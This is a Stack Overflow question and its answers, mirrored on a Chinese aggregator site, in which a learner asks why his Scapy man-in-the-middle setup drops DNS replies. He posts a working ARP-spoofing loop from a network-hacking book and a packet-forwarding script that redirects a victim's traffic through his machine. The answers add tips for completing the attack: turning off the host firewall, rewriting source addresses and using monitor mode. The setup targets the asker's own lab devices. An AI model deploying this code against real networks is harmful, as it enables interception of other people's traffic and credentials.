1. 技术文章
  2. Scapy forwarding packages

Scapy forwarding packages

你离开我真会死。 提交于 2019-12-10 10:05:53

问题


I'm just learning python with scapy. I read and use the book "Network Hacks - Intensivkurs - Angriff und Verteidigung mit Python" (German).

I would like to try a man in the middle attack by using arp-spoofing. I have My Computer, the victim (my raspberry pi) and the standard gateway.

To spoofing, i use a code snippet from the book

#!/usr/bin/python

import sys
import time
from scapy.all import sniff, sendp, ARP, Ether

if len(sys.argv) < 3:
    print sys.argv[0] + " <target> <spoof_ip>"
    sys.exit(0)

iface = "wlan1"
target_ip = sys.argv[1]
fake_ip = sys.argv[2]

ethernet = Ether()
arp = ARP(pdst=target_ip, psrc=fake_ip, op="is-at")
packet = ethernet / arp

while True:
    sendp(packet, iface=iface)
    time.sleep(10)

It works, my victim shows my mac as gateway. The victim sends packets with the correct ip but my mac address. Now the victim should open a website (wget http//example.com) and I want to use Wireshark to read the traffic. But I have to redirect the packages (DNS and TCP/HTTP). I tried it with this code:

#!/etc/usr/python

from scapy.all import *
import sys

iface = "wlan1"
filter = "ip"
VICTIM_IP = "192.168.2.108"
MY_IP = "192.168.2.104"
GATEWAY_IP = "192.168.2.1"
VICTIM_MAC = "### don't want so show###"
MY_MAC = "### don't want so show###"
GATEWAY_MAC = "### don't want so show###"

def handle_packet(packet):
    if (packet[IP].dst == GATEWAY_IP) and (packet[Ether].dst == MY_MAC):
        packet[Ether].dst = GATEWAY_MAC
        sendp(packet)

        print "A packet from " + packet[IP].src + " redirected!"

sniff(prn=handle_packet, filter=filter, iface=iface, store=0)

Wireshark shows a packet with the correct datas (IP Source = Victim IP, IP Destination = Gateway IP, MAC Source = Victim MAC, MAC Destination = Gateway MAC). The Gateway is a DSL-Router, so also a "DNS-Server".

But my Raspberry doesn't receive a DNS response. What's my fault?

Yours faithfully,

MatStorm


回答1:


One thing Scapy does not do for you is handle firewall issues; in this situation you would be well served to turn off the host firewall on your attacking host. The packets you're crafting aren't using the usual path for packets.

Also, are you translating the source address when you forward the packets on so that the response comes to you? I don't see that in the code...




回答2:


Check if monitor mode is on the fake dns server interface. I cannot see from your code if that is done so just a quick tip. I will look closer after some sleep and can see straight. When I did spoofing last time, I had 1 ethernet cable with internet in router and monitor mode on wlan. if I tried without it showed some wanted info but just not right, cant remember for sure what I did to fix it. best of luck.



来源:https://stackoverflow.com/questions/21912854/scapy-forwarding-packages

标签
python
networking
dns
scapy
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!